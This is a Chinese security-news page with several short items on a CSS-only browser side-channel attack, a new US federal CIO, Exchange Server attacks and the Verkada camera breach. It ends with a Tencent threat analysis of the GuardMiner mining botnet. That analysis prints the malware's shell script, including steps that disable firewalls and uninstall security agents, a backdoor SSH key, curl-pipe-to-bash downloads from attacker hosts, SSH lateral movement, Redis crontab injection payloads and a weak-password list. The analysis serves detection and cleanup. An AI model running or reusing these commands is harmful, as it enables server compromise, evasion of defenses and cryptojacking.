分类: 安全快讯

安全团队演示首个基于浏览器的旁道攻击

一支安全研究团队近日展示了基于浏览器的全新旁道攻击(Side-channel attack),即便是 JavaScript 在被阻止的情况下也能生效。目前包括英特尔酷睿、AMD Ryzen、三星 Exynos 甚至于苹果自研芯片 M1 这些硬件平台都受到影响。 为了演示该攻击,安全专家开发了一系列对 JavaScript 功能依赖性降低的攻击,这导致了“首个基于浏览器的旁道攻击”,完全由层叠样式表(CSS)和HTML构建,即使在脚本执行被完全阻止时也能工作。 研究人员表示,这个漏洞甚至可以导致微架构站点指纹攻击。站点指纹攻击允许窃听者通过利用目标数据包序列的特征来确定目标的网络活动。这也就有效地无视了大多数隐私保护技术的应用,如VPN、代理,甚至TOR。 根据该演示背后的研究人员发表的一篇论文,Javascript 已经成为进行旁道攻击的一种流行方式。不过通常情况下浏览器会采用某些方法禁止攻击者精确测量时间,而这是基于 JavaScript 的旁道攻击必不可少的。 论文中写道:“旁道攻击者试图绕过这些限制,通过利用其他浏览器API(如消息传递或多线程)创建具有不同精度的临时计时器”。在浏览器为阻止基于 Javascript 的侧通道攻击所做的所有努力中,最简单的选择是完全禁用 Javascript。例如,苹果在 macOS 上的 Safari 设置中提供了一个完全禁用 Javascript 的选项,以此来减轻此类攻击。 尽管如此,来自美国、澳大利亚和以色列的大学研究人员展示的新形式的攻击依然是有效的,因为它只依赖于 CSS 和 HTML,这使它成为第一个在苹果 M1 芯片上工作的旁道攻击。根据研究论文,分析的重点是 Prime + Probe ,这是一种缓存旁道攻击,它拥有检测目标访问哪些缓存集的能力,然后可以用来洞察目标的情况。 研究人员表示:“除了受到防御措施的影响,微架构攻击还受到消费类设备硬件多样化程度提高的影响。高端处理器市场过去一直由英特尔主导,但过去几年,其他替代产品的普及率越来越高,比如AMD的Zen架构、三星的Exynos,以及最近推出的苹果M1内核”的。 为此研究人员对 AMD 的 Ryzen、三星的 Exynos 和苹果的 M1 芯片进行了攻击评估。结果表明,和英特尔的同类产品相比,有时候攻击在苹果和三星这些新型 CPU 上更加有效,这可能是由于它们的缓存替换策略更简单。 攻击的成功程度取决于目标架构和内部采用的防御措施。该攻击甚至可以在采用英特尔、AMD、三星和苹果 M1 芯片的设备上,针对包括Tor浏览器、Chrome Zero 等在内的强硬浏览器环境发挥作用。 研究人员接着通知了受影响的芯片厂商。苹果公司回应称,公开披露他们的研究结果不会引起任何担忧。对此安全团队表示:“我们推测M1架构利用了不太先进的缓存启发式方法,因此,我们的攻击所执行的简单化内存扫描在这些设备上比在英特尔架构上更能刷新整个缓存”。 团队继续表示:“缓存攻击无法通过降低定时器分辨率,废除定时器、线程或数组,甚至完全禁用脚本支持来防止。这意味着,任何与连接到不受信任网站的浏览器共享缓存资源的秘密承载进程都有潜在的暴露风险”。           (消息来源:cnBeta;封面源自网络)

拜登任命首席信息官 监管政府网络基础升级

据悉,美国现任总统乔·拜登(Joe Biden)任命克莱尔·马托拉纳(Clare Martorana)为美国首席信息官(Chief Information Officer),负责全面监管美国白宫升级政府技术基础设施的工作。Martorana 是美国数字服务部门的资深人士,上任之后将负责加强联邦政府的网络安全,实现 IT 系统的现代化,并使所有公民更容易访问政府网站。 Martorana 还将会负责确保数字选举信息和网上选民登记对每个人都是无障碍的,包括残疾人和英语理解能力有限的人。这部分职责对拜登来说尤为重要,他最近发布了一项旨在加强投票权的行政命令。 Martorana 曾在人事管理办公室担任同样的职位,她有十多年在健康技术公司担任高管的经验,包括 WebMD 和 Everyday Health。2016 年 10 月,她加入了美国退伍军人事务部(USDS)的团队,领导了该机构数字基础设施的现代化工作,并使退伍军人更容易在线访问和管理他们的福利。 在退伍军人事务部,Martorana 利用以人为本的设计原则,让退伍军人参与到设计和开发技术的过程中。Martorana 和 USDS 设计总监 Kat Jurick 在谈到他们在该机构 2019 年的工作时写道:“从重建面向退伍军人的应用程序到创建个性化的仪表板,退伍军人可以在一个地方看到他们的福利,我们的方法是相同的:退伍军人是我们所做的每一个决定的中心”。 现在,Martorana 将承担更大的挑战。目前肆虐美国的新冠疫情凸显了很多政府网站在处理紧急实物方面的补足,使用 60 年前编程语言创建的失业门户网站在高需求下崩溃;全国疫苗推广也需要一个全面的政府数据库。除了疫情,美国政府最近还遭遇了历史上最严重的网络安全漏洞之一–SolarWinds黑客事件,11个政府机构被渗透。           (消息及封面来源:cnBeta)

黑客对微软 Exchange 安全危机虎视眈眈

由于更多的黑客组织涌入,试图在受影响的公司为其服务器打补丁之前趁虚而入,微软Exchange服务器被黑客攻击正成为一个更大的安全问题。微软3月3日披露,黑客组织 “Hafnium”的攻击目标是微软Exchange服务器的漏洞,促使微软发布补丁。 漏洞公布后不久,Hafnium加强了攻击力度,在几天内袭击了3万家美国机构和世界各地的其他机构,但现在其他机构也加入了战团。安全专家告诉《金融时报》,更多的黑客组织正在利用这个机会,利用同样的漏洞进行自己的攻击。包括犯罪集团在内的黑客们,都是在托管服务器的组织打上补丁和保护之前,利用软件漏洞介入的。 对许多人来说,现在先发制人地修补这个问题可能为时已晚。”每一个可能的受害者,如果在上周中到年底还没有打补丁,就已经被至少一个或几个行为者命中了,”安全组织CrowdStrike联合创始人Dmitri Alperovitch这样表示。 在美国之外,欧洲银行业管理局成为第一个确认受到攻击的主要公共机构。 膨胀的攻击规模将在一段时间内成为一个严重的问题,促使政府进行干预。网络安全和基础设施安全局(CISA)已经敦促 “所有部门的所有组织遵循指导,以解决国内和国际上广泛存在的漏洞”。 还有人建议使用微软的IOC检测工具来确定是否发生了脆弱系统的入侵。同时白宫国家安全委员会声称:”任何拥有脆弱服务器的组织都必须立即采取措施,确定是否已经成为目标。”           (消息来源:cnBeta;封面源自网络)

黑客入侵 15 万个 Verkada 监控摄像头

北京时间3月10日消息,一群黑客表示,他们已经入侵了硅谷监控创业公司Verkada收集的海量监控摄像头数据,能够看到医院、公司、警局、监狱以及学校内部的15万个监控摄像头的实时录像情况。 监控视频被曝光的企业包括特斯拉、软件提供商Cloudflare。此外,黑客还能够看到女子卫生诊所、精神病院以及Verkada本身办公室内部的视频。其中一个视频拍摄自特斯拉上海仓库内部,能够看到装配线上的工人。黑客称,他们能够访问特斯拉工厂和仓库内的222个摄像头。 Verkada代表在一份声明中称:“我们已经禁用了所有内部管理员账户来防止任何未经授权的访问。我们的内部安全团队和外部安全团队正在调查这一潜在问题的规模和范围。”特斯拉、Cloudflare等尚未置评。           (消息来源:cnBeta;封面源自网络)

GuardMiner 利用 9 种手法攻击传播 腾讯安全全面拦截

一、概述 腾讯安全威胁情报中心检测到GuardMiner挖矿木马团伙新的攻击活动,该团伙利用Elasticsearch远程代码执行漏洞(CVE-2015-1427)等9种漏洞武器针对云上主机发起攻击。根据检测数据推算,受害主机已过万台,该挖矿木马会卸载云主机安装的安全软件。腾讯安全专家建议企业安全运维人员积极修复服务器组件漏洞,避免使用弱口令,防止云主机被该团伙使用的漏洞武器攻陷。 GuardMiner最早出现于2019年,至今已活跃超过2年,该挖矿木马通过Go语言编写的二进制程序针对Windows平台和Linux平台进行攻击传播,通过crontab定时任务以及安装SSH公钥后门进行持久化控制,并且还会利用比特币的交易记录来动态更新C2地址。 分析发现,GuardMiner挖矿团伙最新的攻击活动利用了多达9种攻击传播手法: 1)    CCTV设备RCE漏洞; 2)    Redis未授权访问漏洞; 3)    Drupal框架CVE-2018-7600漏洞; 4)    Hadoop未授权访问漏洞; 5)    Spring RCE漏洞CVE-2018-1273; 6)    Thinkphp V5高危漏洞; 7)    WebLogic RCE漏洞CVE-2017-10271; 8)    SQL Server弱口令爆破; 9)    Elasticsearch RCE漏洞 CVE-2015-1427、CVE-2014-3120 GuardMiner挖矿团伙入侵云主机后的挖矿行为会对服务器性能产生严重负面影响,服务器的正常业务有中断或崩溃风险。挖矿团伙在失陷服务器留置后门,关闭linux防火墙、卸载云服务器安全软件等行为,会导致服务器安全性受损,增加被其他黑客组织攻击的风险。 排查和加固 由于GuardMiner掌握较强的自动化攻击和扩散感染能力,腾讯安全专家建议企业及时检查以下位置并进行清理,同时对服务器使用的相关组件进行版本检查和漏洞修复,对于Redis、SQL Server使用的弱密码尽快予以纠正。 文件和进程 /etc/phpguard /etc/phpupdate /etc/networkmanager Crontab任务: */30 * * * * sh /etc/newdat.sh */2 * * * * curl -fsSL hxxp://h.epelcdn.com/dd210131/pm.sh SSH公钥(/root/.ssh/authorized_keys): AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/oeXUWDNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfgO06jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBsRZbQVlrPfsxXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvayMH7f+Kl2yXiHN5oD9BVTkdIWX root@u17 腾讯安全响应清单 腾讯安全全系列产品支持对GuardMiner挖矿木马攻击传播的各个环节进行检测拦截。 腾讯安全产品针对GuardMiner团伙漏洞攻击武器,可在各个环节进行检测防御,具体响应清单如下: 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)威胁情报已加入,可赋能全网安全设备。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 网络空间风险云监测系统 (CCMS) 1)GuardMiner相关情报已加入。 腾讯安全云监测系统,面向行业用户的监管方和被监管方,结合漏洞扫描、涉敏内容检测、全网威胁情报发现能力等,为用户提供全面、及时的互联网风险监测评估服务,并可提供配套安全管家服务,可对相关风险提供有效的响应处理。 腾讯T-Sec 高级威胁追溯系统 1)GuardMiner相关情报已支持检索,可自动关联分析到该病毒家族最新变种,使用资产。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud  Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,阻断恶意攻击流量,阻断恶意通信流量: 1)GuardMiner相关联的IOCs已支持识别检测; 2)已支持检测以下漏洞利用攻击: Hadoop未授权访问漏洞 Drupal CVE-2018-7600漏洞 thinkphp TP5高危漏洞 WebLogic CVE-2017-10271漏洞 Elasticsearch CVE-2014-3120远程代码执行漏洞 有关云防火墙的更多信息,可参考:  https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)云镜已支持GuardMiner关联模块的检测告警,查杀清理。 2)已支持检测主机存在的以下相关漏洞: Redis未授权命令执行漏洞 Hadoop未授权访问漏洞 Drupal  CVE-2018-7600漏洞 thinkphp  TP5高危漏洞 WebLogic  CVE-2017-10271漏洞 Elasticsearch  CVE-2014-3120远程代码执行漏洞 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)GuardMinerr相关联的IOCs已支持识别检测; 2)已支持检测以下漏洞利用攻击: Redis未授权命令执行漏洞 Hadoop未授权访问漏洞 Drupal  CVE-2018-7600漏洞 Spring  CVE-2018-1273漏洞 thinkphp  TP5高危漏洞 WebLogic  CVE-2017-10271漏洞 Elasticsearch CVE-2014-3120远程代码执行漏洞Elasticsearch  CVE-2015-1427远程代码执行漏洞 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec 零信任无边界 访问控制系统 (iOA) 1)已支持GuardMiner关联模块的检测告警,查杀清理。 零信任无边界访问控制系统(iOA)是腾讯结合自身丰富的网络安全管理实践经验与“零信任”理念,推出的网络边界访问管控整体解决方案。更多资料,可参考:https://s.tencent.com/product/ioa/index.html 二、样本分析 利用Elasticsearch漏洞入侵 Elasticsearch是用Java语言开发的,并作为Apache许可条款下的开放源码发布,是一种流行的企业级搜索引擎。Elasticsearch用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。 搜索引擎支持使用脚本代码(Groovy)作为表达式进行数据操作,并且加入了沙盒进机制对危险的代码进行拦截,由于沙盒限制的不严格,导致产生远程代码执行漏洞CVE-2015-1427。该漏洞的攻击代码已被公开:hxxps://github.com/t0kx/exploit-CVE-2015-1427/blob/master/exploit.sh 腾讯云防火墙检测到黑客利用CVE-2015-1427漏洞攻击云主机: 利用漏洞执行的恶意命令为: wget hxxp://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh -P /tmp/sssooo 我们对命令下载执行的脚本init.sh进行分析发现其属于挖矿僵尸网络GuardMiner。 环境准备 1. init.sh关闭selinux防火墙 setenforce 0 2>dev/null echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null 2. 清理缓存 sync && echo 3 >/proc/sys/vm/drop_caches 3. 获取crontab目录和SSH公钥认证文件 crondir='/var/spool/cron/'"$USER" cont=`cat ${crondir}` ssht=`cat /root/.ssh/authorized_keys` 4. 将下载程序curl、wget重命名为cdt、wdt bbdir="/usr/bin/curl" bbdira="/usr/bin/cdt" ccdir="/usr/bin/wget" ccdira="/usr/bin/wdt" mv /usr/bin/curl /usr/bin/url mv /usr/bin/url /usr/bin/cdt mv /usr/bin/cur /usr/bin/cdt mv /usr/bin/cdl /usr/bin/cdt mv /usr/bin/cd1 /usr/bin/cdt mv /usr/bin/wget /usr/bin/get mv /usr/bin/get /usr/bin/wdt mv /usr/bin/wge /usr/bin/wdt mv /usr/bin/wdl /usr/bin/wdt mv /usr/bin/wd1 /usr/bin/wdt 5. 设置Linux系统能打开的最大文件数量 ulimit -n 65535 6. 删除系统日志文件 rm -rf /var/log/syslog 7. 设置tmp目录无法被删除 chattr -iua /tmp/ chattr -iua /var/tmp/ 8. 关闭Linux防火墙,删除过滤规则 ufw disable iptables -F 9. 禁用看门狗程序 echo '0' >/proc/sys/kernel/nmi_watchdog echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf 10. 卸载阿里云骑士等云主机安全软件 if ps aux | grep -i '[a]liyun'; then $bbdir http://update.aegis.aliyun.com/download/uninstall.sh | bash $bbdir http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash $bbdira http://update.aegis.aliyun.com/download/uninstall.sh | bash $bbdira http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash pkill aliyun-service rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service rm -rf /usr/local/aegis* systemctl stop aliyun.service systemctl disable aliyun.service service bcm-agent stop yum remove bcm-agent -y apt-get remove bcm-agent -y elif ps aux | grep -i '[y]unjing'; then /usr/local/qcloud/stargate/admin/uninstall.sh /usr/local/qcloud/YunJing/uninst.sh /usr/local/qcloud/monitor/barad/admin/uninstall.sh Fi service apparmor stop systemctl disable apparmor service aliyun.service stop systemctl disable aliyun.service ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 % rm -rf /usr/local/aegis 11. 设置系统最大内存分页 echo 128 > /proc/sys/vm/nr_hugepages sysctl -w vm.nr_hugepages=128 12. 设置挖矿木马、Shell脚本、扫描程序、守护程序的下载URL miner_url="hxxp://176.123.7.127/id210131/phpupdate" miner_url_backup="hxxp://h.epelcdn.com/dd210131/phpupdate" sh_url="hxxp://176.123.7.127/id210131/newdat.sh" sh_url_backup="hxxp://h.epelcdn.com/dd210131/newdat.sh" config_url="hxxp://176.123.7.127/id210131/config.json" config_url_backup="hxxp://h.epelcdn.com/dd210131/config.json" scan_url="hxxp://176.123.7.127/id210131/networkmanager" scan_url_backup="hxxp://h.epelcdn.com/dd210131/networkmanager" watchdog_url="hxxp://176.123.7.127/id210131/phpguard" watchdog_url_backup="hxxp://h.epelcdn.com/dd210131/phpguard" 13. 从比特币的交易记录中动态获取C2地址 (使用的比特币钱包为:1Hf2CKoVDyPj7dNn3vgTeFMgDqVvbVNZQq) if [ -x "$(command -v curl)" ]; then aa="1Hf2CKoVDyPj7dNn3vgTeFMgDqVvbVNZQq" bb="https://api.blockcypher.com/v1/btc/main/addrs/$aa?limit=2" cc=`curl -v --stderr - $bb |grep value|awk '{print $2}' |sed 's/[[:punct:]]//g; s/[[:space:]]/\n/g'|awk '{printf("%x\n",$0)}'|awk '{print substr($0,3,2)}'|awk '{print strtonum("0x"$0)}'|awk 'NR==2'`"."`curl -v --stderr - $bb |grep value|awk '{print $2}' |sed 's/[[:punct:]]//g; s/[[:space:]]/\n/g'|awk '{printf("%x\n",$0)}'|awk '{print substr($0,1,2)}'|awk '{print strtonum("0x"$0)}'|awk 'NR==2'`"."`curl -v --stderr - $bb |grep value|awk '{print $2}' |sed 's/[[:punct:]]//g; s/[[:space:]]/\n/g'|awk '{printf("%x\n",$0)}'|awk '{print substr($0,3,2)}'|awk '{print strtonum("0x"$0)}'|awk 'NR==1'`"."`curl -v --stderr - $bb |grep value|awk '{print $2}' |sed 's/[[:punct:]]//g; s/[[:space:]]/\n/g'|awk '{printf("%x\n",$0)}'|awk '{print substr($0,1,2)}'|awk '{print strtonum("0x"$0)}'|awk 'NR==1'` fi 挖矿 1. init.sh首先通过端口、进程名、文件名、钱包、矿池匹配,清除竞品挖矿木马 2. 然后杀死tmp目录下的或者CPU占用超过40%的可疑程序。 3. 清理被用来挖矿的docker容器 docker ps | grep "pocosow" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "gakeaws" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "azulu" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "auto" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "xmr" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "mine" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "monero" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "slowhttp" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "bash.shell" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "entrypoint.sh" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "/var/sbin/bash" | awk '{print $1}' | xargs -I % docker kill % docker images -a | grep "pocosow" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "gakeaws" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "buster-slim" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "hello-" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "azulu" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "registry" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "xmr" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "auto" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "mine" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "monero" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "slowhttp" | awk '{print $3}' | xargs -I % docker rmi -f % 4. 最后使用内置的URL依次下载攻击者控制的挖矿程序phpupdate、守护程序phpguard、攻击程序networkmanager并启动。 phpupdate采用开源挖矿程序XMRig编译: 持久化 1. init.sh通过安装crontab任务持久化。 if [ ! -f "/usr/bin/crontab" ] then   unlock_cron   echo "*/30 * * * * sh /etc/newdat.sh >/dev/null 2>&1" >> ${crondir}   lock_cron else   unlock_cron   [[ $cont =~ "newdat.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/newdat.sh >/dev/null 2>&1") | crontab -   lock_cron fi 2. 通过写入SSH authorized_keys公钥(留置后门)持久化。 chmod 700 /root/.ssh/       echo >> /root/.ssh/authorized_keys       chmod 600 root/.ssh/authorized_keys       echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/oeXUWDNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfgO06jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBsRZbQVlrPfsxXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvayMH7f+Kl2yXiHN5oD9BVTkdIWX root@u17" >> /root/.ssh/authorized_keys 3. 通过守护程序phpguard持久化 phpguard主要完成以下功能: 1) 将挖矿程序添加到Linux crontab定时任务(Windows sctasks计划任务)中并启动; 2) 通过枚举进程检查挖矿程序是否处于运行状态,如果没有则启动程序,如果挖矿程序文件不存在则重新下载和运行。 横向移动 1.init.sh通过查询本机/root/.ssh/known_hosts中的SSH登陆记录,进行免密登陆连接,然后执行远程脚本spre.sh: if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o- hxxp://h.epelcdn.com/dd210131/spre.sh | bash >/dev/null 2>&1 &' & done fi 2. 直接通过执行攻击脚本spre.sh: $bbdir -fsSL hxxp://h.epelcdn.com/dd210131/spre.sh | bash $bbdira -fsSL hxxp://h.epelcdn.com/dd210131/spre.sh | bash 3. 通过Redis空口令和弱口令入侵 1)首先利用Pnscan、masscan批量扫描6379端口扫描发现Redis服务器,然后尝试进行无密码登陆,或者利用以下弱口令进行爆破登陆: redis root oracle password p@aaw0rd abc123 abc123! 123456 admin 2)Redis入侵登陆成功后,利用Redis未授权访问漏洞,在系统中写入恶意crontab任务,在任务中下载和执行恶意脚本pm.sh进行感染。 echo 'config set dbfilename "backup.db"' > .dat echo 'save' >> .dat echo 'flushall' >> .dat echo 'set backup1 "\n\n\n*/2 * * * * curl -fsSL hxxp://h.epelcdn.com/dd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup2 "\n\n\n*/3 * * * * wget -q -O- hxxp://h.epelcdn.com/dd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup3 "\n\n\n*/4 * * * * cdt -fsSL hxxp://localhost/bd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup4 "\n\n\n*/5 * * * * wdt -q -O- hxxp://localhost/bd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup1 "\n\n\n*/6 * * * * cd1 -fsSL hxxp://h.epelcdn.com/dd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup2 "\n\n\n*/7 * * * * wd1 -q -O- hxxp://h.epelcdn.com/dd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup3 "\n\n\n*/8 * * * * cd1 -fsSL hxxp://localhost/bd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup4 "\n\n\n*/9 * * * * wd1 -q -O- hxxp://localhost/bd210131/pm.sh | sh\n\n"' >> .dat echo 'config set dir "var/spool/cron/"' >> .dat echo 'config set dbfilename "root"' >> .dat echo 'save' >> .dat echo 'config set dir "var/spool/cron/crontabs"' >> .dat echo 'save' >> .dat 4. 通过下载的攻击程序networkmanager进行横向移动,利用9种服务器应用的漏洞进行远程攻击,将go语言编写的木马程序networkmanager还原函数名的到如下内容: 1) Redis未授权访问漏洞; __tmp_0324_scan_exp_Redis_exploit __tmp_0324_scan_exp_re_exploit_connect_redis __tmp_0324_scan_exp_re_exploit_rce __tmp_0324_scan_exp_re_exploit_redis_brute __tmp_0324_scan_exp_re_exploit_unaurority_rce 2) Drupal RCE漏洞CVE-2018-7600; __tmp_0324_scan_exp_Drupal_exploit __tmp_0324_scan_exp_dp_7600_rce __tmp_0324_scan_exp_dp_7600_ver8_rce __tmp_0324_scan_exp_dp_7600_ver8_rce_func1 __tmp_0324_scan_exp_dp_check_payload __tmp_0324_scan_exp_dp_check_payload_func1 __tmp_0324_scan_exp_dp_isdrupal __tmp_0324_scan_exp_dp_isdrupal_func1 3) Hadoop未授权访问漏洞; __tmp_0324_scan_exp_Hadoop_exploit __tmp_0324_scan_exp_hd_exploit_unaurority_rce __tmp_0324_scan_exp_hd_exploit_unaurority_rce_func1 __tmp_0324_scan_exp_hd_exploit_unaurority_rce_func2 4) Spring RCE漏洞CVE-2018-1273; __tmp_0324_scan_exp_Spring_exploit __tmp_0324_scan_exp_sp_cve20181273_exists __tmp_0324_scan_exp_sp_cve20181273_exists_func1 __tmp_0324_scan_exp_sp_cve20181273_exploit __tmp_0324_scan_exp_sp_cve20181273_exploit_func1 5) Thinkphp V5高危漏洞; __tmp_0324_scan_exp_Thinkphp_exploit __tmp_0324_scan_exp_tp5_23_rce_Exists __tmp_0324_scan_exp_tp5_23_rce_Exists_func1 __tmp_0324_scan_exp_tp5_rce_Exists __tmp_0324_scan_exp_tp5_rce_Exists_func1 __tmp_0324_scan_exp_tp_exploit_tp5_23_rce_exp __tmp_0324_scan_exp_tp_exploit_tp5_23_rce_exp_func1 __tmp_0324_scan_exp_tp_exploit_tp5_23rce __tmp_0324_scan_exp_tp_exploit_tp5rce __tmp_0324_scan_exp_tp_exploit_tp5rce_exp __tmp_0324_scan_exp_tp_exploit_tp5rce_exp_func1 __tmp_0324_scan_exp_tp_isThinkphp __tmp_0324_scan_exp_tp_isThinkphp_func1 6) WebLogic RCE漏洞CVE-2017-10271; __tmp_0324_scan_exp_Weblogic_exploit __tmp_0324_scan_exp_wl_cve201710271_rce __tmp_0324_scan_exp_wl_cve201710271_rce_func1 __tmp_0324_scan_exp_wl_cve201710271_t_rce __tmp_0324_scan_exp_wl_wls_urlistrue __tmp_0324_scan_exp_wl_wls_urlistrue_func1 7) SQLServer爆破登陆后利用xp_cmdshell、SP_OACreate执行Payload; __tmp_0324_scan_exp_Sqlserver_exploit __tmp_0324_scan_exp_ss_crack_login __tmp_0324_scan_exp_ss_execute_payload __tmp_0324_scan_exp_ss_execute_sql __tmp_0324_scan_exp_ss_exploit __tmp_0324_scan_exp_ss_exploit_sp_oacreate __tmp_0324_scan_exp_ss_exploit_xcmdshell 8) Elasticsearch远程代码执行漏洞 CVE-2015-1427、CVE-2014-3120; __tmp_0324_scan_exp_es_exploit_cve20143120_rce __tmp_0324_scan_exp_es_exploit_cve20143120_rce_func1 __tmp_0324_scan_exp_es_exploit_cve20143120_t_rce __tmp_0324_scan_exp_es_exploit_cve20151427_rce __tmp_0324_scan_exp_es_exploit_cve20151427_rce_func1 __tmp_0324_scan_exp_es_exploit_cve20151427_t_rce 9) CCTV设备RCE漏洞。 __tmp_0324_scan_exp_Cctv_exploit __tmp_0324_scan_exp_cc_is_shell_rce __tmp_0324_scan_exp_cc_is_shell_rce_func1 __tmp_0324_scan_exp_cc_shell_rce __tmp_0324_scan_exp_cc_shell_rce_func1 __tmp_0324_scan_exp_cc_shell_t_rce 三、威胁视角看攻击行为 ATT&CK阶段 行为 侦察 扫描IP端口,确认可攻击目标存在的Web服务:WebLogic, Elasticsearch等。 资源开发 注册C2服务器,利用比特币交易记录更新C2地址 初始访问 利用对外开放的WebLogic, Elasticsearch服务,植入恶意Payload执行恶意命令进而入侵系统 执行 首先植入恶意脚本执行恶意命令,随后下载挖矿、持久化和攻击模块 持久化 创建Crontab任务、写入SSH后门公钥,启动守护进程phpguard 横向移动 利用Redis未授权访问漏洞、SSH免密登陆、Wed应用漏洞等方法横向移动 防御规避 木马文件加壳保护,将文件命名为系统文件名并设置为系统属性 发现 通过~/.ssh/known_hosts和~/.ssh/id_rsa.pub发现入侵主机历史登录凭据,用于进一步横向移动 命令与控制 守护模块phpguard,存在动态更新C2地址,根据不同的系统下发不同的Payload、执行任意命令的功能 影响 门罗币矿机不间断的工作,会导致系统CPU负载过大,大量消耗主机CPU资源,严重影响主机正常服务运行,导致主机有系统崩溃风险。 该团伙相关的威胁数据已加入腾讯安全威胁情报,已赋能给腾讯全系列安全产品,用户可以通过订阅腾讯安全威胁情报产品,让全网安全设备同步具备相应的威胁检测、防御能力。 推荐政企用户在公有云中部署腾讯云防火墙、腾讯主机安全(云镜)等产品检测防御相关威胁。 腾讯云防火墙已支持拦截利用Elasticsearch漏洞发起的恶意攻击行为。 腾讯主机安全(云镜)可对病毒攻击过程中产生得木马落地文件进行自动检测,用户可后台一键隔离,删除。 私有云用户可通过腾讯高级威胁检测系统(御界)进行流量检测分析,及时发现黑客团伙的攻击活动。 腾讯高级威胁检测系统(御界)可检测到利用Elasticsearch远程代码执行漏洞CVE-2015-1427发起的恶意攻击行为。   IOCs MD5: Networkmanager 9960bac4ddc3e864a167e03037b9e65a Phpguard 35269826d788370c3be184261adde884 Phpupdate 149c79bf71a54ec41f6793819682f790 spre.sh 4da10654aeecef6c766c3352a07955de scan.sh 1b849002406d6370754c45c6b3a41e9a pm.sh 37298c13dba7a26ae068dd02225fb5b5 Domain h.epelcdn.com sh.epelcdn.com URL hxxp://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh hxxp://h.epelcdn.com/dd210131/spre.sh hxxp://h.epelcdn.com/dd210131/scan.sh 